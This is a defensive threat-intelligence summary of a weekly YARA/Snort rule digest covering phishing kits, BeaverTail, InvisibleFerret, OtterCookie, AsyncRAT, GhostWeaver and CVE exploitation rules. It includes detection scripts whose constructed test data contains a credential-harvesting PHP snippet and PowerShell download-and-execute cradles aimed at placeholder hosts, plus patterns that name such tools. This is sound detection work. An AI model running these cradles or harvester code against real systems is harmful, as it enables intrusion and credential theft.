Full Report
The following is the information on Yara and Snort rules (week 2, March 2025) collected and shared by the AhnLab TIP service. 5 YARA Rules Detection name Description Source PK_Generic_RD127 Phishing Kit – RD127 – Generic email credentials stealer https://github.com/t4d/PhishingKit-Yara-Rules PK_LIDL_ninja Phishing Kit impersonating LIDL https://github.com/t4d/PhishingKit-Yara-Rules PK_MTBank_yochi2 Phishing Kit impersonating M&T Bank https://github.com/t4d/PhishingKit-Yara-Rules PK_SpareBank_perso Phishing […]
Analysis Summary
The provided context is a list of detection rules (YARA and Snort) published by AhnLab TIP for the second week of March 2025. This information focuses on indicators of compromise and detection logic rather than specific, newly discovered malware families or threat actor TTPs in depth, although several known malware families are referenced in the Snort rules.
# Tool/Technique: Phishing Kits (YARA Signatures)
## Overview
A collection of YARA rules designed to detect specific known or custom phishing kits likely deployed to harvest credentials, impersonating various legitimate entities.
## Technical Details
- Type: Tool/Malware Class (Phishing Kits)
- Platform: Web servers (PHP/HTML kits hosted on attacker-registered or compromised sites)
- Capabilities: Credential harvesting, brand impersonation.
- First Seen: Varies with the underlying kit; the detection rules themselves are recent (March 2025).
## MITRE ATT&CK Mapping
These kits primarily align with techniques related to initial access via deception and credential compromise:
- **TA0001 - Initial Access**
- T1566 - Phishing
- T1566.001 - Spearphishing Attachment (when the lure page ships as an HTML attachment that posts to the hosted kit)
- T1566.002 - Spearphishing Link (the usual delivery: a link to the hosted kit)
## Functionality
### Core Capabilities
- **Credential Stealing:** Designed to capture user input from a fake login form, as the generic `PK_Generic_RD127` rule name states (email credentials stealer).
- **Brand Impersonation:** Kits are configured to mimic legitimate organizations (LIDL, M&T Bank, SpareBank, Trust Wallet) to trick victims.
### Advanced Features
- Not visible from the rule names, but kits of this class typically include a relay for the captured input (PHP `mail()` to a drop address, or a Telegram bot API call), a redirect to the genuine site after capture so the victim suspects nothing, and crawler/IP blocklists (`.htaccess` or PHP checks) to keep scanners away from the page.
## Indicators of Compromise
*Note: As these are detection rules, specific IoCs are embedded within the rules themselves, not explicitly listed here.*
- File Hashes: N/A (References YARA rules)
- File Names: N/A (Rules target content/structure)
- Registry Keys: N/A
- Network Indicators: N/A (Rules target web content/structure)
- Behavioral Indicators: Detection based on patterns characteristic of known phishing kit code structures.
## Associated Threat Actors
The specific actors using these exact kits are not named, but the general activity is associated with cybercriminals engaged in financial fraud or digital identity theft.
## Detection Methods
- **Signature-based detection:** Provided via 5 specific YARA rules:
- `PK_Generic_RD127`
- `PK_LIDL_ninja`
- `PK_MTBank_yochi2`
- `PK_SpareBank_perso`
- `PK_TrustWallet_next`
- **Behavioral detection:** N/A (YARA focuses on static content)
- **YARA rules:** Specific rules mentioned above available via the linked source.
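The detection logic behind a generic "credential stealer" kit rule is a conjunction of a few static traits, which is easier to see in code than in prose. The scanner below is an added example written for this page; it is not one of the t4d/PhishingKit-Yara-Rules rules and the two-file sample kit, the indicator names and the `rd127@example.invalid` drop address are constructed here. It mirrors a YARA rule's shape (named strings plus a condition) in plain Python so it runs without `yara-python`:

```python
"""Added example: a minimal static scanner that emulates what a generic
'credential stealer' phishing-kit signature looks for. Illustrative code,
not the t4d/PhishingKit-Yara-Rules project's rules; the sample kit files
below are constructed for this example."""
import re
from typing import Dict, List

# Constructed sample "kit": a fake login page plus the PHP that relays input.
SAMPLE_KIT: Dict[str, str] = {
    "index.html": (
        '<form method="POST" action="next.php">'
        '<input type="text" name="email">'
        '<input type="password" name="password">'
        "</form>"
    ),
    "next.php": (
        "<?php\n"
        "$ip = $_SERVER['REMOTE_ADDR'];\n"
        "$msg = 'Email: '.$_POST['email'].\"\\n\".'Pass: '.$_POST['password'];\n"
        "$to = 'rd127@example.invalid';\n"
        "mail($to, 'Result', $msg);\n"
        "header('Location: https://www.example.com/');\n"
    ),
    "style.css": "body { font-family: sans-serif; }",
}

# Each indicator is a name and a regex, mirroring the named strings of a YARA rule.
INDICATORS = {
    "captures_password":  re.compile(r"\$_(POST|REQUEST)\[['\"](pass(word)?|pwd)['\"]\]", re.I),
    "captures_login":     re.compile(r"\$_(POST|REQUEST)\[['\"](email|user(name)?|login)['\"]\]", re.I),
    "collects_victim_ip": re.compile(r"\$_SERVER\[['\"]REMOTE_ADDR['\"]\]"),
    "exfil_mail":         re.compile(r"\bmail\s*\(", re.I),
    "exfil_curl_or_bot":  re.compile(r"curl_init|api\.telegram\.org/bot", re.I),
    "redirect_after":     re.compile(r"header\s*\(\s*['\"]Location:", re.I),
}

def scan_file(content: str) -> List[str]:
    """Return the indicator names present in one file's content."""
    return [name for name, rx in INDICATORS.items() if rx.search(content)]

def is_generic_credential_stealer(hits: List[str]) -> bool:
    """YARA-style condition: captures a password AND relays it somewhere
    AND shows at least one more kit trait (login field, IP logging, redirect)."""
    exfil = {"exfil_mail", "exfil_curl_or_bot"}
    extra = {"captures_login", "collects_victim_ip", "redirect_after"}
    h = set(hits)
    return "captures_password" in h and bool(h & exfil) and bool(h & extra)

def scan_kit(files: Dict[str, str]) -> Dict[str, List[str]]:
    """Scan every file of a kit; return {filename: hits} for files that match."""
    results: Dict[str, List[str]] = {}
    for name, content in files.items():
        hits = scan_file(content)
        if is_generic_credential_stealer(hits):
            results[name] = hits
    return results

if __name__ == "__main__":
    for fname, hits in scan_kit(SAMPLE_KIT).items():
        print(f"{fname}: PK_Generic-style match ({', '.join(hits)})")
```

The condition is deliberately a conjunction: any single trait (a `mail()` call, a `Location:` redirect) is common in benign PHP, and it is the combination of password capture plus an exfiltration channel plus a kit trait that separates a harvester from ordinary code. The same structure is what keeps a generic YARA rule's false-positive rate down when it is run over an entire web root.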
## Mitigation Strategies
- **Prevention measures:** Email and URL filtering, phishing-resistant MFA (FIDO2/WebAuthn, which does not yield a replayable credential even when the user is fooled), and awareness training on spotting look-alike login pages.
- **Hardening recommendations:** On hosting you control, run the YARA rules over web roots and upload directories and alert on newly created PHP files there; brand owners can run them against takedown-feed samples to confirm the kit family before filing.
## Related Tools/Techniques
- Other web-based credential harvesting scripts or front-end web application attacks.
***
# Tool/Technique: BeaverTail Malware
## Overview
BeaverTail is a malware family for which the digest lists two Snort rules covering Command and Control (CnC) traffic sent as HTTP POST requests; the rule names say nothing about the sample beyond that.
## Technical Details
- Type: Malware (Trojan/Backdoor)
- Platform: Not stated; the rules are network signatures and match the traffic regardless of the host OS.
- Capabilities: Beaconing to a CnC server over HTTP POST, which for a backdoor implies tasking and data upload.
- First Seen: Not specified in the context; the rules are part of the March 2025 update.
## MITRE ATT&CK Mapping
Based on CnC activity observed:
- **TA0011 - Command and Control**
- T1071 - Application Layer Protocol
- T1071.001 - Web Protocols (HTTP/HTTPS)
## Functionality
### Core Capabilities
- **CnC Communication:** Sending data or receiving commands via HTTP POST requests identified by specific Snort rule patterns (`ET TROJAN BeaverTail CnC Activity (POST) M1`, `M2`).
### Advanced Features
- None explicitly detailed, standard backdoor functionality implied.
## Indicators of Compromise
- File Hashes: N/A
- File Names: N/A
- Registry Keys: N/A
- Network Indicators: Traffic matching BeaverTail CnC patterns observed via POST requests.
- Behavioral Indicators: Specific network patterns associated with BeaverTail CnC callbacks.
## Associated Threat Actors
Not specified in the context list.
## Detection Methods
- **Signature-based detection:** Snort rules `ET TROJAN BeaverTail CnC Activity (POST) M1` and `ET TROJAN BeaverTail CnC Activity (POST) M2`.
- **Behavioral detection:** Baseline outbound HTTP POSTs per endpoint and flag new destinations, non-browser User-Agent strings and fixed-interval beaconing, which catches variants the two signatures do not cover.
- **YARA rules:** N/A
## Mitigation Strategies
- **Prevention measures:** Strict egress firewall policies limiting outbound connections to unknown destinations.
- **Hardening recommendations:** Network monitoring for protocol anomalies on standard ports.
## Related Tools/Techniques
- Other web-based Trojans utilizing HTTP for C2 infrastructure.
***
# Tool/Technique: InvisibleFerret Malware
## Overview
InvisibleFerret is a Trojan/Backdoor family detected via Snort rules monitoring its Command and Control (CnC) activity using both GET and POST HTTP methods.
## Technical Details
- Type: Malware (Trojan/Backdoor)
- Platform: Not stated; the rules are network signatures and are platform-agnostic.
- Capabilities: Persistent communication with CnC infrastructure, suggesting remote access or staging.
- First Seen: Not specified in the context; the rules are part of the March 2025 update.
## MITRE ATT&CK Mapping
Based on CnC activity observed:
- **TA0011 - Command and Control**
- T1071 - Application Layer Protocol
- T1071.001 - Web Protocols (HTTP/HTTPS)
## Functionality
### Core Capabilities
- **CnC Communication:** Both GET and POST requests are used for C2 interactions, indicated by multiple rule variants (`M1`, `M4`, `M5`, `M6`).
### Advanced Features
- Multiple rule variants (M1, M4, M5, M6) across two HTTP methods mean the family has several distinct request shapes; a sensor that loads only one of the variants will miss the others, so all of them should be enabled together.
## Indicators of Compromise
- File Hashes: N/A
- File Names: N/A
- Registry Keys: N/A
- Network Indicators: Traffic matching InvisibleFerret GET and POST C2 activity.
- Behavioral Indicators: Specific network request characteristics.
## Associated Threat Actors
Not specified in the context list.
## Detection Methods
- **Signature-based detection:** Multiple Snort rules: `ET TROJAN InvisibleFerret CnC Activity (GET) M4/M5/M6` and `ET TROJAN InvisibleFerret CnC Activity (POST) M1`.
- **Behavioral detection:** Monitoring for sequential or recurring C2 patterns involving both HTTP methods.
- **YARA rules:** N/A
## Mitigation Strategies
- **Prevention measures:** Route outbound HTTP through a web proxy, and terminate TLS there where policy permits, so the IDS and proxy logs see the request line, headers and body rather than an opaque connection.
- **Hardening recommendations:** Deploy IDS/IPS systems configured to recognize detailed C2 traffic signatures.
## Related Tools/Techniques
- Other malware utilizing hybrid HTTP methods for C2 communications.
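The GET/POST rule variants above (BeaverTail M1/M2, InvisibleFerret M1/M4/M5/M6) are easier to reason about with a small evaluator for the content-matching part of a Snort 3 / Suricata style HTTP rule. This is an added example written for this page, not code from AhnLab or the Emerging Threats project; the three rules and the requests are constructed here (sids in the 9000000 range, the `FakeTail`/`FakeFerret` names) because the digest does not reproduce the real rule bodies, and only the `http.method`, `http.uri`, `http.user_agent` and `http.request_body` sticky buffers with `content`/`startswith` are implemented:

```python
"""Added example: a tiny evaluator for the content-matching part of
Snort 3 / Suricata sticky-buffer HTTP rules, to show why a family's
signatures come in separate GET and POST variants. The rules and requests
are constructed for this example, NOT the Emerging Threats rule bodies."""
import re
from typing import Dict, List

# Constructed rules. Each variant pins a different combination of method,
# URI and header/body, so no single rule can cover all request shapes.
RULES = r'''
alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"EXAMPLE TROJAN FakeTail CnC Activity (POST) M1"; flow:established,to_server; http.method; content:"POST"; http.uri; content:"/uploads"; startswith; http.user_agent; content:"axios/"; startswith; sid:9000001; rev:1;)
alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"EXAMPLE TROJAN FakeFerret CnC Activity (GET) M4"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/payload/"; http.user_agent; content:"python-requests/"; startswith; sid:9000004; rev:1;)
alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"EXAMPLE TROJAN FakeFerret CnC Activity (POST) M1"; flow:established,to_server; http.method; content:"POST"; http.uri; content:"/keys"; startswith; http.request_body; content:"|22|type|22 3a 22|ssh|22|"; sid:9000005; rev:1;)
'''

BUFFERS = ("http.method", "http.uri", "http.user_agent", "http.request_body")
# option name, optional value (quoted strings may contain ';'), terminating ';'
OPT_RE = re.compile(r'(\w[\w.]*)(?::("(?:[^"\\]|\\.)*"|[^;]*))?;')

def decode_content(raw: str) -> bytes:
    """Turn a Snort content string into bytes: literal text plus |hex| escapes."""
    out = bytearray()
    for i, part in enumerate(raw.split("|")):
        if i % 2:  # odd segments sit between pipes: hex bytes
            out += bytes.fromhex(part.replace(" ", ""))
        else:
            out += part.encode()
    return bytes(out)

def parse_rule(line: str) -> Dict:
    """Parse the option block into {msg, sid, checks:[{buf, bytes, startswith}]}."""
    opts = line[line.index("(") + 1 : line.rindex(")")]
    rule: Dict = {"msg": "", "sid": None, "checks": []}
    buf = "payload"  # default buffer until a sticky buffer keyword appears
    for name, val in OPT_RE.findall(opts):
        val = val.strip().strip('"')
        if name in BUFFERS:
            buf = name                      # sticky buffer: later contents target it
        elif name == "content":
            rule["checks"].append({"buf": buf, "bytes": decode_content(val), "startswith": False})
        elif name == "startswith":
            rule["checks"][-1]["startswith"] = True  # modifies the preceding content
        elif name == "msg":
            rule["msg"] = val
        elif name == "sid":
            rule["sid"] = int(val)
    return rule

def match(rule: Dict, req: Dict[str, bytes]) -> bool:
    """Every content check must hold on its selected buffer."""
    for c in rule["checks"]:
        data = req.get(c["buf"], b"")
        ok = data.startswith(c["bytes"]) if c["startswith"] else c["bytes"] in data
        if not ok:
            return False
    return True

def evaluate(rules_text: str, req: Dict[str, bytes]) -> List[int]:
    """Return the sids of every rule that fires on one request."""
    rules = [parse_rule(l) for l in rules_text.strip().splitlines() if l.startswith("alert")]
    return [r["sid"] for r in rules if match(r, req)]

# Constructed requests, already split into the buffers an HTTP inspector fills.
POST_KEYS = {"http.method": b"POST", "http.uri": b"/keys", "http.user_agent": b"python-requests/2.31",
             "http.request_body": b'{"type":"ssh","data":"..."}'}
GET_PAYLOAD = {"http.method": b"GET", "http.uri": b"/payload/99", "http.user_agent": b"python-requests/2.31",
               "http.request_body": b""}
BENIGN = {"http.method": b"GET", "http.uri": b"/keys", "http.user_agent": b"Mozilla/5.0", "http.request_body": b""}

if __name__ == "__main__":
    for name, req in (("POST /keys", POST_KEYS), ("GET /payload", GET_PAYLOAD), ("benign GET /keys", BENIGN)):
        print(name, "->", evaluate(RULES, req))
```

Two things the run makes concrete: the `(GET)` and `(POST)` rules are disjoint because `http.method` is checked like any other buffer, so a family that uses both methods needs both rules loaded; and the benign `GET /keys` request shows why a URI alone is not a signature, the body or header check is what makes the POST variant specific.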
***
# Tool/Technique: OtterCookie Malware
## Overview
OtterCookie is a malware family whose five Snort rules in this digest cover an entire C2 loop: host profile exfiltration, an inbound command, confirmation that the command ran, file exfiltration, and a request for an additional payload.
## Technical Details
- Type: Malware (Trojan/Backdoor)
- Platform: Not specified.
- Capabilities: File exfiltration, command execution confirmation, receiving payloads, and basic check-ins.
- First Seen: Not specified in the context; the rules are part of the March 2025 update.
## MITRE ATT&CK Mapping
The five rule names cover a full C2 loop, so the mapping spans several tactics:
- **TA0007 - Discovery**
- T1082 - System Information Discovery (the host profile that is exfiltrated)
- **TA0002 - Execution**
- T1059 - Command and Scripting Interpreter (inbound command, execution confirmation)
- **TA0011 - Command and Control**
- T1071.001 - Web Protocols
- T1105 - Ingress Tool Transfer (`Payload Request`)
- **TA0010 - Exfiltration**
- T1041 - Exfiltration Over C2 Channel (`Host Profile Exfil`, `File Exfiltration`)
## Functionality
### Core Capabilities
- **File Exfiltration:** Sending collected data back to the attacker.
- **Command and Response:** Confirmation of victim command execution.
- **Payload Distribution:** Requesting and downloading additional components (`Payload Request`).
### Advanced Features
- The inbound-command rule keys on a fixed token, `whour`, in the C2 protocol. Such literal tokens give precise matches but are brittle: if the operator renames the token, the rule needs a new revision.
## Indicators of Compromise
- File Hashes: N/A
- File Names: N/A
- Registry Keys: N/A
- Network Indicators: Requests matching the `Host Profile Exfil`, `File Exfiltration` and `Payload Request` signatures, and server responses matching `CnC Command Inbound (whour)`.
- Behavioral Indicators: Sequences of C2 interactions indicating command execution confirmation (`Victim Command Execution Confirmation To CnC Server`).
## Associated Threat Actors
Not specified in the context list.
## Detection Methods
- **Signature-based detection:** Several Snort rules covering various communications: `Host Profile Exfil`, `CnC Command Inbound (whour)`, `File Exfiltration`, `Victim Command Execution Confirmation To CnC Server`, and `Payload Request`.
- **Behavioral detection:** Detecting the sequence of C2 activities characteristic of OtterCookie operation.
- **YARA rules:** N/A
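The behavioral angle above, detecting the sequence rather than any single hit, is a correlation job on top of the IDS. The script below is an added example written for this page, not AhnLab or Emerging Threats code: it reads Suricata EVE-JSON style alert lines, keys each alert on the internal host, and raises an incident when a host progresses through three or more stages in order within a window. The six log lines are constructed, the signature names are illustrative stand-ins for the OtterCookie rules, and the 30-minute window and three-stage threshold are assumptions to tune:

```python
"""Added example: correlate per-host IDS alerts into a kill-chain style
incident, as a behavioural layer on top of single-signature rules. The
EVE-JSON style lines below are constructed for this example and the
signature names are illustrative, not the actual Emerging Threats rules."""
import json
from datetime import datetime, timedelta
from typing import Dict, List, Optional, Tuple

# Stage labels in the order the digest lists them for the OtterCookie rules.
STAGES = ["Host Profile Exfil", "CnC Command Inbound",
          "Victim Command Execution Confirmation", "File Exfiltration"]

# Constructed alerts: one host runs the full loop, one only profiles itself.
ALERTS = [
    '{"timestamp":"2025-03-10T09:00:05","event_type":"alert","src_ip":"10.0.0.5","dest_ip":"203.0.113.7","alert":{"signature":"EXAMPLE TROJAN OtterCookie-like Host Profile Exfil"}}',
    '{"timestamp":"2025-03-10T09:01:10","event_type":"alert","src_ip":"203.0.113.7","dest_ip":"10.0.0.5","alert":{"signature":"EXAMPLE TROJAN OtterCookie-like CnC Command Inbound (whour)"}}',
    '{"timestamp":"2025-03-10T09:01:12","event_type":"flow","src_ip":"10.0.0.5","dest_ip":"203.0.113.7"}',
    '{"timestamp":"2025-03-10T09:01:15","event_type":"alert","src_ip":"10.0.0.5","dest_ip":"203.0.113.7","alert":{"signature":"EXAMPLE TROJAN OtterCookie-like Victim Command Execution Confirmation To CnC Server"}}',
    '{"timestamp":"2025-03-10T09:04:00","event_type":"alert","src_ip":"10.0.0.5","dest_ip":"203.0.113.7","alert":{"signature":"EXAMPLE TROJAN OtterCookie-like File Exfiltration"}}',
    '{"timestamp":"2025-03-10T11:30:00","event_type":"alert","src_ip":"10.0.0.9","dest_ip":"203.0.113.7","alert":{"signature":"EXAMPLE TROJAN OtterCookie-like Host Profile Exfil"}}',
]

def stage_of(signature: str) -> Optional[str]:
    """Map a signature msg to a stage label by substring (illustrative)."""
    for s in STAGES:
        if s in signature:
            return s
    return None

def correlate(lines: List[str], window: timedelta = timedelta(minutes=30),
              min_stages: int = 3) -> Dict[str, Dict]:
    """Group alerts by internal host (src_ip for outbound, dest_ip for the
    inbound command) and report hosts that hit >= min_stages distinct stages
    in kill-chain order within `window`. Returns {host: {stages, first, last}}."""
    by_host: Dict[str, List[Tuple[datetime, str]]] = {}
    for line in lines:
        ev = json.loads(line)
        if ev.get("event_type") != "alert":
            continue                      # flows, DNS etc. are not alerts
        stage = stage_of(ev["alert"]["signature"])
        if stage is None:
            continue                      # unrelated signature
        host = ev["dest_ip"] if "Inbound" in stage else ev["src_ip"]
        by_host.setdefault(host, []).append((datetime.fromisoformat(ev["timestamp"]), stage))

    incidents: Dict[str, Dict] = {}
    for host, events in by_host.items():
        events.sort()
        seen: List[str] = []
        first = last = None
        for ts, stage in events:
            if first is None or ts - first > window:
                seen, first = [], ts      # outside the window: restart the chain
            # accept the stage only if it advances the chain
            if stage not in seen and (not seen or STAGES.index(stage) > STAGES.index(seen[-1])):
                seen.append(stage)
                last = ts
            if len(seen) >= min_stages:
                incidents[host] = {"stages": list(seen), "first": first.isoformat(), "last": last.isoformat()}
    return incidents

if __name__ == "__main__":
    for host, inc in correlate(ALERTS).items():
        print(f"{host}: {len(inc['stages'])} stages {inc['first']} -> {inc['last']}: {inc['stages']}")
```

The inbound command is keyed on `dest_ip` because the victim is the destination of that packet; forgetting that split is the usual reason a chain never completes in practice. A lone `Host Profile Exfil` hit (10.0.0.9 here) stays a single alert, while the host that reaches execution confirmation is the one worth paging on.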
## Mitigation Strategies
- **Prevention measures:** Egress filtering with a proxy allowlist for servers and sensitive workstations, so uploads of host profiles and files to unknown hosts are blocked rather than merely logged.
- **Hardening recommendations:** Feed the CnC endpoints seen in `CnC Command Inbound` and `Payload Request` hits into the blocklist, and treat a `Victim Command Execution Confirmation` hit as a compromised host that needs isolation and reimaging, not only a network block.
## Related Tools/Techniques
- Other modular Trojans utilizing HTTP for multi-stage operations.
***
# Tool/Technique: AsyncRAT Malware
## Overview
AsyncRAT is a Remote Access Trojan (RAT) family detected by network signatures indicating initial contact (checkin) and requests for new installation payloads.
## Technical Details
- Type: Malware (RAT)
- Platform: Implied Windows (Common target for AsyncRAT).
- Capabilities: Remote administration, code execution, and potentially malware distribution.
- First Seen: Not specified in the context; the rules are part of the March 2025 update.
## MITRE ATT&CK Mapping
Based on the two rule names (check-in and installer payload request):
- **TA0011 - Command and Control**
- T1071.001 - Web Protocols
- T1105 - Ingress Tool Transfer (`Installer Payload Request`)
- **TA0002 - Execution** (inherent to a RAT once the payload runs; not evidenced by the rules themselves)
## Functionality
### Core Capabilities
- **Victim Checkin:** Establishing initial contact with the C2 server.
- **Installer Request:** Requesting a secondary or new installation payload (`Installer Payload Request`).
### Advanced Features
- As a RAT, it provides remote control capabilities.
## Indicators of Compromise
- File Hashes: N/A
- File Names: N/A
- Registry Keys: N/A
- Network Indicators: Requests matching the `AsyncRAT Victim Checkin` and `AsyncRAT Installer Payload Request` signatures; the rule names do not disclose the method or URI.
- Behavioral Indicators: The characteristic traffic patterns associated with AsyncRAT initialization.
## Associated Threat Actors
Not specified in the context list.
## Detection Methods
- **Signature-based detection:** Snort rules `AsyncRAT Installer Payload Request` and `AsyncRAT Victim Checkin`.
- **Behavioral detection:** Monitoring for traffic patterns indicative of RAT initial setup.
- **YARA rules:** N/A
## Mitigation Strategies
- **Prevention measures:** Strict outbound network access controls; behavioral monitoring on endpoints to detect RAT processes attempting to make persistent network connections.
- **Hardening recommendations:** Pair the network rules with endpoint telemetry (process creation, script block logs): a `Victim Checkin` hit tells you a host is infected, but only the endpoint logs show which loader fetched the installer payload and where it persisted.
## Related Tools/Techniques
- Quasar RAT (AsyncRAT is derived from the Quasar codebase), Gh0st RAT, DarkComet, and other mainstream remote access tools.
***
# Tool/Technique: GhostWeaver Backdoor (Contextual to Win32/SocGholish)
## Overview
A single Snort rule, filed under the Win32/SocGholish category, covers GhostWeaver backdoor activity: an HTTP request made from PowerShell to download BOINC.
## Technical Details
- Type: Backdoor/Malware Association (Win32/SocGholish linkage)
- Platform: Windows (Implied by Win32 and PowerShell usage)
- Capabilities: Downloading and running a payload via PowerShell; here the payload is BOINC, a legitimate volunteer-computing client, so its retrieval by a backdoor indicates the victim's compute is being enrolled by the attacker, not a user-initiated install.
- First Seen: Not specified.
## MITRE ATT&CK Mapping
- **TA0002 - Execution**
- T1059 - Command and Scripting Interpreter
- T1059.001 - PowerShell
- **TA0011 - Command and Control**
- T1105 - Ingress Tool Transfer (the BOINC download request)
- **TA0001 - Initial Access** (context only: SocGholish itself arrives via T1189 - Drive-by Compromise, fake browser-update prompts on compromised websites; this rule does not observe that stage)
## Functionality
### Core Capabilities
- **PowerShell Execution:** Initiating remote commands via PowerShell.
- **External Download:** Attempting to download resources associated with BOINC (a distributed computing platform, sometimes misused by threat actors).
### Advanced Features
- Use of common system tools (PowerShell) for stealthy execution.
## Indicators of Compromise
- File Hashes: N/A
- File Names: N/A
- Registry Keys: N/A
- Network Indicators: HTTP download requests for BOINC matching the rule, issued by a PowerShell client.
- Behavioral Indicators: PowerShell execution involving remote URLs associated with this detection category.
## Associated Threat Actors
Not specified. SocGholish (also tracked as FakeUpdates) is a loader delivered through fake browser-update prompts on compromised websites and is commonly used to broker initial access for other groups, so a GhostWeaver hit should be read as a follow-on stage of that chain.
## Detection Methods
- **Signature-based detection:** Snort rule `ET TROJAN Win32/SocGholish GhostWeaver Backdoor Activity (PowerShell BOINC Download Request)`.
- **Behavioral detection:** Script block logging and analysis of potentially malicious PowerShell commands.
- **YARA rules:** N/A
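The script-block-logging check above is the endpoint-side counterpart of the network rule, and it is the one that still works once the download goes over TLS. The hunt below is an added example written for this page, not AhnLab or Emerging Threats code: it reads exported Windows events (Event ID 4104 script blocks and Event ID 4688 process creation), decodes `-EncodedCommand` arguments, and flags download-cradle plus execution combinations. The four events, host names and `example.invalid` URLs are constructed; the real SocGholish BOINC request is not reproduced in the digest, so the BOINC URL here is a placeholder:

```python
"""Added example: hunting for PowerShell download cradles in Windows event
log exports (Script Block Logging, Event ID 4104, and process creation,
Event ID 4688). The events below are constructed for this example and the
hostnames/URLs are placeholders, not indicators from the digest."""
import base64
import re
from typing import Dict, List

URL_RE = re.compile(r"https?://[^\s'\"<>]+", re.I)
DOWNLOAD_RE = re.compile(r"Invoke-WebRequest|\biwr\b|Invoke-RestMethod|\birm\b|DownloadString|DownloadFile"
                         r"|Net\.WebClient|Start-BitsTransfer|curl\.exe|certutil.*-urlcache", re.I)
EXEC_RE = re.compile(r"Invoke-Expression|\biex\b|Start-Process|\bsaps\b|Unblock-File", re.I)
EVASION_RE = re.compile(r"-(nop|noprofile|w(indowstyle)?\s+hidden|ep\s+bypass|executionpolicy\s+bypass)\b", re.I)

# Constructed events: benign admin script, a 4104 BOINC cradle, an encoded
# 4688 cradle, and a benign 4688 line that must NOT be mis-decoded.
EVENTS: List[Dict] = [
    {"EventID": 4104, "Computer": "WS01", "ScriptBlockText": "Get-ChildItem C:\\Users | Sort-Object Length"},
    {"EventID": 4104, "Computer": "WS01", "ScriptBlockText":
        "$c=New-Object Net.WebClient;$c.DownloadFile('https://cdn.example.invalid/boinc/win/boinc.exe',"
        "\"$env:TEMP\\boinc.exe\");Start-Process \"$env:TEMP\\boinc.exe\" -ArgumentList "
        "'--attach_project https://boinc.example.invalid/ key'"},
    {"EventID": 4688, "Computer": "WS02", "CommandLine": "powershell.exe -nop -w hidden -enc " + base64.b64encode(
        "IEX (iwr 'https://cdn.example.invalid/x.ps1' -UseBasicParsing).Content".encode("utf-16le")).decode()},
    {"EventID": 4688, "Computer": "WS03", "CommandLine": "powershell.exe -ErrorAction SilentlyContinue -File C:\\scripts\\backup.ps1"},
]

def decode_encoded_command(cmdline: str) -> str:
    """If the command line carries -EncodedCommand (any prefix: -e, -ec, -enc ...)
    followed by base64, return the decoded UTF-16LE script; else return cmdline."""
    m = re.search(r"-e[a-z]*\s+([A-Za-z0-9+/=]{16,})", cmdline, re.I)
    if not m:
        return cmdline
    try:
        text = base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return cmdline
    # a real encoded command decodes to readable script text; anything else
    # (e.g. '-ErrorAction SilentlyContinue' mis-read as base64) is rejected
    if all(32 <= ord(ch) < 127 or ch in "\r\n\t" for ch in text):
        return text
    return cmdline

def hunt(events: List[Dict]) -> List[Dict]:
    """Return one finding per event that both fetches from a URL and executes."""
    findings = []
    for ev in events:
        if ev["EventID"] == 4104:
            text, source = ev["ScriptBlockText"], "4104"
        elif ev["EventID"] == 4688:
            text, source = decode_encoded_command(ev["CommandLine"]), "4688"
        else:
            continue
        if not (DOWNLOAD_RE.search(text) and EXEC_RE.search(text)):
            continue
        findings.append({
            "host": ev["Computer"],
            "source": source,
            "urls": URL_RE.findall(text),
            # evasion switches live on the launcher command line, not in the script body
            "evasion": bool(EVASION_RE.search(ev.get("CommandLine", text))),
        })
    return findings

if __name__ == "__main__":
    for f in hunt(EVENTS):
        print(f"{f['host']} [{f['source']}] evasion={f['evasion']} urls={f['urls']}")
```

Decoding `-EncodedCommand` matters because the cradle text never appears in the 4688 command line otherwise, and the printable-text check is what stops `-ErrorAction SilentlyContinue` (sixteen base64-alphabet characters) from being decoded into garbage and producing a false positive. Script Block Logging (4104) is the more reliable source since it records the de-obfuscated block as PowerShell actually runs it.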
## Mitigation Strategies
- **Prevention measures:** Application control (AppLocker/WDAC) for unsigned binaries dropped to user-writable paths, PowerShell Constrained Language Mode for non-administrators, and egress filtering so PowerShell cannot reach arbitrary hosts.
- **Hardening recommendations:** Enable PowerShell Script Block Logging (Event ID 4104) and Module Logging, forward them to the SIEM, and alert on download-cradle patterns (`Net.WebClient`, `Invoke-WebRequest`, `IEX`) in script blocks.
## Related Tools/Techniques
- Other fileless malware or loaders utilizing PowerShell for downloading secondary stages.
***
*(The remaining Snort rules reference specific CVE exploitation attempts or generic attack responses, detailed below)*
# Tool/Technique: CVE Exploitation Attempts & Generic Attack Responses
## Overview
A set of Snort rules that indicate active exploitation attempts against known vulnerabilities or post-exploitation responses.
## Technical Details
- Type: Technique/Vulnerability Activity
- Platform: Varies (Web Apps, Cisco devices, etc.)
- Capabilities: Probing for known weaknesses or responding to attack patterns.
- First Seen: Depends on the original disclosure dates of the CVEs, but rule updates are recent (March 2025).
## MITRE ATT&CK Mapping
Varies by rule: T1190 - Exploit Public-Facing Application for the CVE rules; for the ClickFix rules, T1204 - User Execution (the victim pastes a command into the Run dialog or a terminal) and, where mshta is the launcher, T1218.005 - System Binary Proxy Execution: Mshta.
## Functionality
### Core Capabilities
- **Exploitation Attempts:** Requests shaped to trigger specific known vulnerabilities (NAKIVO Backup & Replication, Jenkins, Cisco ASA/FTD, Hitachi Vantara Pentaho), with impact ranging from file and memory disclosure to remote code execution.
- **Attack Response:** The `ET ATTACK_RESPONSE ClickFix` rules do not detect exploitation; they match the follow-on traffic after a user has been talked into running a pasted command (command inbound, result logging), which is the first point where a ClickFix intrusion is visible on the wire.
### Advanced Features
- Detection focuses on the specific HTTP requests or payloads known to trigger these vulnerabilities.
## Indicators of Compromise
- Network Indicators: Traffic matching the signature profiles for the referenced CVEs or activity associated with ClickFix/MSHTA command patterns.
## Associated Threat Actors
Not specified.
## Detection Methods
- **Signature-based detection:** Numerous specific Snort rules, e.g. targeting CVE-2024-48248 (NAKIVO Backup & Replication path traversal), CVE-2018-1000861 (Jenkins Stapler RCE), CVE-2020-3259 (Cisco ASA/FTD memory disclosure) and CVE-2022-43769 (Hitachi Vantara Pentaho BA Server).
- **Attack/Response Detection:** The `ET ATTACK_RESPONSE ClickFix` rules cover the post-execution traffic of ClickFix lures; a hit means the pasted command already ran, so the host should be treated as compromised and the endpoint logs pulled for the command that was pasted.
## Mitigation Strategies
